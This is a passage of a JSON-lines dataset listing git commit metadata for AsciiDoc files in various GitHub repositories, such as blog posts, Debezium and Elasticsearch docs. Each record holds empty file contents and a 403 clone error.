ch11-bigdata.adoc","repos":"ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs","old_file":"developer-tools\/java\/chapters\/ch11-bigdata.adoc","new_file":"developer-tools\/java\/chapters\/ch11-bigdata.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ManoMarks\/labs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"8654e5ac180e76761ace646e914bf918b846366f","subject":"y2b create post IMPORTANT ANNOUNCEMENT!","message":"y2b create post IMPORTANT ANNOUNCEMENT!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-10-10-IMPORTANT-ANNOUNCEMENT.adoc","new_file":"_posts\/2011-10-10-IMPORTANT-ANNOUNCEMENT.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1b00ef3192333c1388c1f7b327662aa6e24fc2c3","subject":"Update 2015-09-14-Episode-21-Feelin-Good.adoc","message":"Update 2015-09-14-Episode-21-Feelin-Good.adoc","repos":"blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io","old_file":"_posts\/2015-09-14-Episode-21-Feelin-Good.adoc","new_file":"_posts\/2015-09-14-Episode-21-Feelin-Good.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blahcadepodcast\/blahcadepodcast.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d396631c6abcade0c58ef541651158c7cd764437","subject":"Update 2018-09-08-Go.adoc","message":"Update 2018-09-08-Go.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-09-08-Go.adoc","new_file":"_posts\/2018-09-08-Go.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"18fb4877cf873ad4e53812de66c847b85d96aeaa","subject":"Update 2015-02-17-Lemons.adoc","message":"Update 2015-02-17-Lemons.adoc","repos":"SwarnaKishore\/blog,SwarnaKishore\/blog,SwarnaKishore\/blog","old_file":"_posts\/2015-02-17-Lemons.adoc","new_file":"_posts\/2015-02-17-Lemons.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/SwarnaKishore\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ddcec910e8cfc08c074d9e662fa6d98a3c85d908","subject":"Update 2016-07-22-Stable-Graph-Matching.adoc","message":"Update 2016-07-22-Stable-Graph-Matching.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-22-Stable-Graph-Matching.adoc","new_file":"_posts\/2016-07-22-Stable-Graph-Matching.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"888befc52e637c47bc3e8323f40fa09431232996","subject":"Update 2017-06-21-Podcast-Brad-Billings.adoc","message":"Update 2017-06-21-Podcast-Brad-Billings.adoc","repos":"gjagush\/gjagush.github.io,gjagush\/gjagush.github.io,gjagush\/gjagush.github.io,gjagush\/gjagush.github.io","old_file":"_posts\/2017-06-21-Podcast-Brad-Billings.adoc","new_file":"_posts\/2017-06-21-Podcast-Brad-Billings.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gjagush\/gjagush.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8f408bb7013c4dfe4cd913abfad98ff69d1ff430","subject":"y2b create post 3 Cool Tech Deals - #14","message":"y2b create post 3 Cool Tech Deals - #14","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-03-28-3-Cool-Tech-Deals--14.adoc","new_file":"_posts\/2016-03-28-3-Cool-Tech-Deals--14.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fdfe2dd2133d39568fd724b25d5a860816c7322c","subject":"Update 2017-09-30-Matrix-Layer-Rotation.adoc","message":"Update 2017-09-30-Matrix-Layer-Rotation.adoc","repos":"JithinPavithran\/JithinPavithran.github.io,JithinPavithran\/JithinPavithran.github.io,JithinPavithran\/JithinPavithran.github.io,JithinPavithran\/JithinPavithran.github.io","old_file":"_posts\/2017-09-30-Matrix-Layer-Rotation.adoc","new_file":"_posts\/2017-09-30-Matrix-Layer-Rotation.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/JithinPavithran\/JithinPavithran.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d0a405dbbac2f1d1af36da622321ee7d4664038f","subject":"y2b create post Corsair Vengeance 1500 v2 Unboxing (Gaming Headset)","message":"y2b create post Corsair Vengeance 1500 v2 Unboxing (Gaming Headset)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2014-02-18-Corsair-Vengeance-1500-v2-Unboxing-Gaming-Headset.adoc","new_file":"_posts\/2014-02-18-Corsair-Vengeance-1500-v2-Unboxing-Gaming-Headset.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"65c029e22aa2eda85e7a6904956d5f38878d1e1d","subject":"Update 2015-02-12-dev.adoc","message":"Update 2015-02-12-dev.adoc","repos":"devkamboj\/devkamboj.github.io,devkamboj\/devkamboj.github.io,devkamboj\/devkamboj.github.io,devkamboj\/devkamboj.github.io","old_file":"_posts\/2015-02-12-dev.adoc","new_file":"_posts\/2015-02-12-dev.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/devkamboj\/devkamboj.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8dc78b5868ee96e0c7ca3247e2df775a5df09abe","subject":"Update 2015-09-17-917.adoc","message":"Update 2015-09-17-917.adoc","repos":"stay-india\/stay-india.github.io,stay-india\/stay-india.github.io,stay-india\/stay-india.github.io","old_file":"_posts\/2015-09-17-917.adoc","new_file":"_posts\/2015-09-17-917.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/stay-india\/stay-india.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6f4efac31d74f04593ad35d650b4be9342fb8524","subject":"Update 2015-02-20-Python-Para-principantes.adoc","message":"Update 2015-02-20-Python-Para-principantes.adoc","repos":"devopSkill\/devopskill.github.io,devopSkill\/devopskill.github.io,devopSkill\/devopskill.github.io","old_file":"_posts\/2015-02-20-Python-Para-principantes.adoc","new_file":"_posts\/2015-02-20-Python-Para-principantes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/devopSkill\/devopskill.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0f6db4006dddb3758e216e2e264cf6bbcdfaee54","subject":"Update 2016-05-04-Wordpress-Settings-A-P-I.adoc","message":"Update 2016-05-04-Wordpress-Settings-A-P-I.adoc","repos":"heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io","old_file":"_posts\/2016-05-04-Wordpress-Settings-A-P-I.adoc","new_file":"_posts\/2016-05-04-Wordpress-Settings-A-P-I.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/heliomsolivas\/heliomsolivas.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e782806d50b226850df519629c1561e0f9da1139","subject":"Bringing back \"DBZ-4260 Blog post for Debezium UI topic auto-creation\";","message":"Bringing back \"DBZ-4260 Blog post for Debezium UI topic auto-creation\";\n\nThis reverts commit 52454acf0d6e348c3263b610516df6163d3931e4. Also adjusting name and some other minor fixes.\n","repos":"debezium\/debezium.github.io,debezium\/debezium.github.io,debezium\/debezium.github.io","old_file":"_posts\/2021-12-02-debezium-ui-topic-groups.adoc","new_file":"_posts\/2021-12-02-debezium-ui-topic-groups.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/debezium\/debezium.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"77e24ef134a558f3dba44ff8de3c9524a6ca1895","subject":"Update 2015-10-13-HDFS-tutorial.adoc","message":"Update 2015-10-13-HDFS-tutorial.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-10-13-HDFS-tutorial.adoc","new_file":"_posts\/2015-10-13-HDFS-tutorial.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9223e21d8f0332cc77bc9be3637503d92f91f624","subject":"Update 2015-10-25-Back-to-Basic.adoc","message":"Update 2015-10-25-Back-to-Basic.adoc","repos":"gilangdanu\/blog,gilangdanu\/blog,gilangdanu\/blog","old_file":"_posts\/2015-10-25-Back-to-Basic.adoc","new_file":"_posts\/2015-10-25-Back-to-Basic.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gilangdanu\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3e994ab1ef45e969b3ae6dd3e25f3d1800a940fb","subject":"Update 2013-06-04-Class-PHPUnit_Framework_TestCase-could-not-be-found-when-installing-CakePHP-through-Composer.adoc","message":"Update 2013-06-04-Class-PHPUnit_Framework_TestCase-could-not-be-found-when-installing-CakePHP-through-Composer.adoc","repos":"ElteHupkes\/eltehupkes.github.io,ElteHupkes\/eltehupkes.github.io,ElteHupkes\/eltehupkes.github.io,ElteHupkes\/eltehupkes.github.io","old_file":"_posts\/2013-06-04-Class-PHPUnit_Framework_TestCase-could-not-be-found-when-installing-CakePHP-through-Composer.adoc","new_file":"_posts\/2013-06-04-Class-PHPUnit_Framework_TestCase-could-not-be-found-when-installing-CakePHP-through-Composer.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ElteHupkes\/eltehupkes.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5e59e63dfd2fa10253b070850e436b355bb72762","subject":"0.7.1 Release announcement blogpost","message":"0.7.1 Release announcement blogpost\n","repos":"debezium\/debezium.github.io,debezium\/debezium.github.io,debezium\/debezium.github.io","old_file":"blog\/2017-12-20-debezium-0-7-1-released.adoc","new_file":"blog\/2017-12-20-debezium-0-7-1-released.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/debezium\/debezium.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"766972a024da7bc7c2f72256e29b9c9035e528b7","subject":"Update 2016-03-12-.adoc","message":"Update 2016-03-12-.adoc","repos":"kai-cn\/kai-cn.github.io,kai-cn\/kai-cn.github.io,kai-cn\/kai-cn.github.io,kai-cn\/kai-cn.github.io","old_file":"_posts\/2016-03-12-.adoc","new_file":"_posts\/2016-03-12-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kai-cn\/kai-cn.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c94404f70940b3d09a8fe1c72dbe9af4dc752f17","subject":"Update 2016-03-16-.adoc","message":"Update 2016-03-16-.adoc","repos":"s-f-ek971\/s-f-ek971.github.io,s-f-ek971\/s-f-ek971.github.io,s-f-ek971\/s-f-ek971.github.io,s-f-ek971\/s-f-ek971.github.io","old_file":"_posts\/2016-03-16-.adoc","new_file":"_posts\/2016-03-16-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/s-f-ek971\/s-f-ek971.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8f2d229a39847438cbdb81207536df03e6ccca74","subject":"Update 2017-03-03-mark-read-all-by-Google-Extension.adoc","message":"Update 2017-03-03-mark-read-all-by-Google-Extension.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-03-03-mark-read-all-by-Google-Extension.adoc","new_file":"_posts\/2017-03-03-mark-read-all-by-Google-Extension.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7b81833f23373f50edfa8c27eb57854795822155","subject":"Create team.adoc","message":"Create team.adoc\n\nCreated missing team document.","repos":"jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org","old_file":"src\/docs\/asciidoc\/team.adoc","new_file":"src\/docs\/asciidoc\/team.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jMonkeyEngine\/wiki.jmonkeyengine.org.git\/': The requested URL returned error: 403\n","license":"cc0-1.0","lang":"AsciiDoc"} {"commit":"49c9762aff2b8a8487688da963f766f610ddcf71","subject":"Add git-sync.adoc","message":"Add git-sync.adoc\n","repos":"toalexjin\/git-scripts","old_file":"doc\/git-sync.adoc","new_file":"doc\/git-sync.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/toalexjin\/git-scripts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"84f10e1ba9d411a3da52db022d7750f6dc9da374","subject":"Update 2019-08-27-promise.adoc","message":"Update 2019-08-27-promise.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2019-08-27-promise.adoc","new_file":"_posts\/2019-08-27-promise.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fb5a7a77f22b2b0ff0cdd1d19f78ba71b273ccbe","subject":"Update 2018-06-24-Laravel56-Request.adoc","message":"Update 2018-06-24-Laravel56-Request.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-06-24-Laravel56-Request.adoc","new_file":"_posts\/2018-06-24-Laravel56-Request.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"35678fa0865de26c5f15ce2cbb121b6ce35d8def","subject":"Update 2014-03-17-One-Formatter-to-rule-them-all.adoc","message":"Update 2014-03-17-One-Formatter-to-rule-them-all.adoc","repos":"velo\/velo.github.io,velo\/velo.github.io,velo\/velo.github.io,velo\/velo.github.io","old_file":"_posts\/2014-03-17-One-Formatter-to-rule-them-all.adoc","new_file":"_posts\/2014-03-17-One-Formatter-to-rule-them-all.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/velo\/velo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"94407af2018ab2b7ea5e7bf9f8bcbb44a96f80b6","subject":"y2b create post A Mysterious Coca-Cola Surprise...","message":"y2b create post A Mysterious Coca-Cola Surprise...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-02-28-A-Mysterious-CocaCola-Surprise.adoc","new_file":"_posts\/2017-02-28-A-Mysterious-CocaCola-Surprise.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5d1dcf9ffb0c8ef93ddf1818acd21ef2bfb26209","subject":"added documentation","message":"added documentation\n","repos":"easel\/paas-skeleton,easel\/paas-skeleton","old_file":"docs\/patton.adoc","new_file":"docs\/patton.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/easel\/paas-skeleton.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ecabf0b0c261fd241d076e8bfde53f3e2e345fdc","subject":"ex 5 text","message":"ex 5 text\n","repos":"cybercomsweden\/javaee-exercises,christer155\/javaee-exercises,christer155\/javaee-exercises,cybercomsweden\/javaee-exercises,ivargrimstad\/javaee-exercises,ivargrimstad\/javaee-exercises","old_file":"exercise-5\/README.adoc","new_file":"exercise-5\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ivargrimstad\/javaee-exercises.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"80397da70d7f40ece5458678c6a384b6eb9105fc","subject":"Update 2015-07-11-Connecting-Thermocouples-to-the-BeBoPr.adoc","message":"Update 2015-07-11-Connecting-Thermocouples-to-the-BeBoPr.adoc","repos":"modmaker\/modmaker.github.io,modmaker\/modmaker.github.io,modmaker\/modmaker.github.io","old_file":"_posts\/2015-07-11-Connecting-Thermocouples-to-the-BeBoPr.adoc","new_file":"_posts\/2015-07-11-Connecting-Thermocouples-to-the-BeBoPr.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/modmaker\/modmaker.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ec15bb49911093cf9db9c242351a9e7ab5f23a45","subject":"CAMEL-16341 - Having a middle folder for vertx components","message":"CAMEL-16341 - Having a middle folder for vertx components\n","repos":"adessaigne\/camel,pax95\/camel,pax95\/camel,cunningt\/camel,apache\/camel,tdiesler\/camel,tdiesler\/camel,pax95\/camel,christophd\/camel,tdiesler\/camel,tadayosi\/camel,cunningt\/camel,nikhilvibhav\/camel,tdiesler\/camel,tadayosi\/camel,adessaigne\/camel,pax95\/camel,apache\/camel,tdiesler\/camel,apache\/camel,christophd\/camel,cunningt\/camel,christophd\/camel,apache\/camel,adessaigne\/camel,adessaigne\/camel,nikhilvibhav\/camel,nikhilvibhav\/camel,nikhilvibhav\/camel,adessaigne\/camel,tadayosi\/camel,pax95\/camel,cunningt\/camel,adessaigne\/camel,apache\/camel,christophd\/camel,pax95\/camel,tadayosi\/camel,christophd\/camel,tadayosi\/camel,cunningt\/camel,apache\/camel,christophd\/camel,cunningt\/camel,tdiesler\/camel,tadayosi\/camel","old_file":"docs\/components\/modules\/ROOT\/pages\/vertx-kafka-component.adoc","new_file":"docs\/components\/modules\/ROOT\/pages\/vertx-kafka-component.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/adessaigne\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b5e3d351d9fe065d7c14c9b7d9c2a4544fb2bd48","subject":"Fix typos in threads docs","message":"Fix typos in threads docs\n\nThis commit fixes a typo in the threads docs where the past tense form\r\nof a verb was used when current tense is needed.\r\n\r\nRelates #22016\r\n","repos":"pozhidaevak\/elasticsearch,coding0011\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,MaineC\/elasticsearch,ZTE-PaaS\/elasticsearch,wuranbo\/elasticsearch,pozhidaevak\/elasticsearch,fernandozhu\/elasticsearch,wuranbo\/elasticsearch,Helen-Zhao\/elasticsearch,wangtuo\/elasticsearch,Helen-Zhao\/elasticsearch,robin13\/elasticsearch,bawse\/elasticsearch,brandonkearby\/elasticsearch,LeoYao\/elasticsearch,mjason3\/elasticsearch,wenpos\/elasticsearch,MisterAndersen\/elasticsearch,markwalkom\/elasticsearch,vroyer\/elassandra,LeoYao\/elasticsearch,mikemccand\/elasticsearch,LeoYao\/elasticsearch,qwerty4030\/elasticsearch,nilabhsagar\/elasticsearch,nazarewk\/elasticsearch,a2lin\/elasticsearch,shreejay\/elasticsearch,gingerwizard\/elasticsearch,nilabhsagar\/elasticsearch,Shepard1212\/elasticsearch,mikemccand\/elasticsearch,qwerty4030\/elasticsearch,nazarewk\/elasticsearch,alexshadow007\/elasticsearch,fernandozhu\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,elasticdog\/elasticsearch,a2lin\/elasticsearch,wangtuo\/elasticsearch,pozhidaevak\/elasticsearch,gingerwizard\/elasticsearch,gfyoung\/elasticsearch,nilabhsagar\/elasticsearch,i-am-Nathan\/elasticsearch,robin13\/elasticsearch,vroyer\/elasticassandra,jprante\/elasticsearch,kalimatas\/elasticsearch,IanvsPoplicola\/elasticsearch,fernandozhu\/elasticsearch,C-Bish\/elasticsearch,IanvsPoplicola\/elasticsearch,ZTE-PaaS\/elasticsearch,HonzaKral\/elasticsearch,vroyer\/elasticassandra,bawse\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,henakamaMSFT\/elasticsearch,LeoYao\/elasticsearch,gingerwizard\/elasticsearch,rlugojr\/elasticsearch,henakamaMSFT\/elasticsearch,artnowo\/elasticsearch,rlugojr\/elasticsearch,LeoYao\/elasticsearch,masaruh\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,maddin2016\/elasticsearch,lks21c\/elasticsearch,robin13\/elasticsearch,jprante\/elasticsearch,umeshdangat\/elasticsearch,winstonewert\/elasticsearch,shreejay\/elasticsearch,jimczi\/elasticsearch,elasticdog\/elasticsearch,Shepard1212\/elasticsearch,GlenRSmith\/elasticsearch,nazarewk\/elasticsearch,JackyMai\/elasticsearch,gfyoung\/elasticsearch,obourgain\/elasticsearch,maddin2016\/elasticsearch,bawse\/elasticsearch,brandonkearby\/elasticsearch,rajanm\/elasticsearch,qwerty4030\/elasticsearch,shreejay\/elasticsearch,markwalkom\/elasticsearch,C-Bish\/elasticsearch,robin13\/elasticsearch,wuranbo\/elasticsearch,fred84\/elasticsearch,rlugojr\/elasticsearch,obourgain\/elasticsearch,vroyer\/elasticassandra,qwerty4030\/elasticsearch,JackyMai\/elasticsearch,nknize\/elasticsearch,geidies\/elasticsearch,scorpionvicky\/elasticsearch,jimczi\/elasticsearch,gingerwizard\/elasticsearch,naveenhooda2000\/elasticsearch,pozhidaevak\/elasticsearch,mikemccand\/elasticsearch,i-am-Nathan\/elasticsearch,winstonewert\/elasticsearch,brandonkearby\/elasticsearch,artnowo\/elasticsearch,mikemccand\/elasticsearch,nezirus\/elasticsearch,mortonsykes\/elasticsearch,scorpionvicky\/elasticsearch,coding0011\/elasticsearch,nknize\/elasticsearch,brandonkearby\/elasticsearch,nilabhsagar\/elasticsearch,Stacey-Gammon\/elasticsearch,nknize\/elasticsearch,s1monw\/elasticsearch,uschindler\/elasticsearch,uschindler\/elasticsearch,mohit\/elasticsearch,winstonewert\/elasticsearch,fforbeck\/elasticsearch,lks21c\/elasticsearch,i-am-Nathan\/elasticsearch,kalimatas\/elasticsearch,mohit\/elasticsearch,wenpos\/elasticsearch,glefloch\/elasticsearch,mortonsykes\/elasticsearch,wenpos\/elasticsearch,rajanm\/elasticsearch,ZTE-PaaS\/elasticsearch,HonzaKral\/elasticsearch,njlawton\/elasticsearch,sneivandt\/elasticsearch,geidies\/elasticsearch,fernandozhu\/elasticsearch,jimczi\/elasticsearch,StefanGor\/elasticsearch,gfyoung\/elasticsearch,rajanm\/elasticsearch,sneivandt\/elasticsearch,maddin2016\/elasticsearch,lks21c\/elasticsearch,henakamaMSFT\/elasticsearch,i-am-Nathan\/elasticsearch,JackyMai\/elasticsearch,coding0011\/elasticsearch,winstonewert\/elasticsearch,gfyoung\/elasticsearch,strapdata\/elassandra,LewayneNaidoo\/elasticsearch,nezirus\/elasticsearch,njlawton\/elasticsearch,markwalkom\/elasticsearch,mortonsykes\/elasticsearch,masaruh\/elasticsearch,jprante\/elasticsearch,rajanm\/elasticsearch,scorpionvicky\/elasticsearch,Stacey-Gammon\/elasticsearch,wenpos\/elasticsearch,naveenhooda2000\/elasticsearch,Helen-Zhao\/elasticsearch,i-am-Nathan\/elasticsearch,jprante\/elasticsearch,bawse\/elasticsearch,obourgain\/elasticsearch,sneivandt\/elasticsearch,strapdata\/elassandra,fforbeck\/elasticsearch,fforbeck\/elasticsearch,markwalkom\/elasticsearch,JackyMai\/elasticsearch,mjason3\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,uschindler\/elasticsearch,nknize\/elasticsearch,elasticdog\/elasticsearch,jimczi\/elasticsearch,glefloch\/elasticsearch,scottsom\/elasticsearch,obourgain\/elasticsearch,coding0011\/elasticsearch,kalimatas\/elasticsearch,GlenRSmith\/elasticsearch,wangtuo\/elasticsearch,fernandozhu\/elasticsearch,qwerty4030\/elasticsearch,StefanGor\/elasticsearch,artnowo\/elasticsearch,C-Bish\/elasticsearch,vroyer\/elassandra,JSCooke\/elasticsearch,fforbeck\/elasticsearch,pozhidaevak\/elasticsearch,C-Bish\/elasticsearch,coding0011\/elasticsearch,s1monw\/elasticsearch,scottsom\/elasticsearch,artnowo\/elasticsearch,Helen-Zhao\/elasticsearch,StefanGor\/elasticsearch,robin13\/elasticsearch,Shepard1212\/elasticsearch,Stacey-Gammon\/elasticsearch,IanvsPoplicola\/elasticsearch,elasticdog\/elasticsearch,geidies\/elasticsearch,obourgain\/elasticsearch,wangtuo\/elasticsearch,naveenhooda2000\/elasticsearch,mohit\/elasticsearch,wenpos\/elasticsearch,shreejay\/elasticsearch,scorpionvicky\/elasticsearch,henakamaMSFT\/elasticsearch,bawse\/elasticsearch,GlenRSmith\/elasticsearch,s1monw\/elasticsearch,njlawton\/elasticsearch,C-Bish\/elasticsearch,JSCooke\/elasticsearch,mohit\/elasticsearch,masaruh\/elasticsearch,fred84\/elasticsearch,rlugojr\/elasticsearch,fred84\/elasticsearch,uschindler\/elasticsearch,mortonsykes\/elasticsearch,Shepard1212\/elasticsearch,StefanGor\/elasticsearch,masaruh\/elasticsearch,rajanm\/elasticsearch,geidies\/elasticsearch,HonzaKral\/elasticsearch,mjason3\/elasticsearch,a2lin\/elasticsearch,rajanm\/elasticsearch,mikemccand\/elasticsearch,geidies\/elasticsearch,nezirus\/elasticsearch,wangtuo\/elasticsearch,maddin2016\/elasticsearch,scottsom\/elasticsearch,lks21c\/elasticsearch,JackyMai\/elasticsearch,markwalkom\/elasticsearch,a2lin\/elasticsearch,JSCooke\/elasticsearch,ZTE-PaaS\/elasticsearch,MaineC\/elasticsearch,kalimatas\/elasticsearch,scottsom\/elasticsearch,GlenRSmith\/elasticsearch,a2lin\/elasticsearch,masaruh\/elasticsearch,scottsom\/elasticsearch,winstonewert\/elasticsearch,alexshadow007\/elasticsearch,nknize\/elasticsearch,mohit\/elasticsearch,MaineC\/elasticsearch,rlugojr\/elasticsearch,gingerwizard\/elasticsearch,Helen-Zhao\/elasticsearch,alexshadow007\/elasticsearch,glefloch\/elasticsearch,wuranbo\/elasticsearch,IanvsPoplicola\/elasticsearch,gfyoung\/elasticsearch,brandonkearby\/elasticsearch,fred84\/elasticsearch,nilabhsagar\/elasticsearch,glefloch\/elasticsearch,artnowo\/elasticsearch,markwalkom\/elasticsearch,LewayneNaidoo\/elasticsearch,mortonsykes\/elasticsearch,scorpionvicky\/elasticsearch,jimczi\/elasticsearch,njlawton\/elasticsearch,s1monw\/elasticsearch,glefloch\/elasticsearch,njlawton\/elasticsearch,IanvsPoplicola\/elasticsearch,umeshdangat\/elasticsearch,umeshdangat\/elasticsearch,wuranbo\/elasticsearch,LeoYao\/elasticsearch,nazarewk\/elasticsearch,henakamaMSFT\/elasticsearch,LewayneNaidoo\/elasticsearch,fforbeck\/elasticsearch,geidies\/elasticsearch,Shepard1212\/elasticsearch,mjason3\/elasticsearch,lks21c\/elasticsearch,elasticdog\/elasticsearch,sneivandt\/ela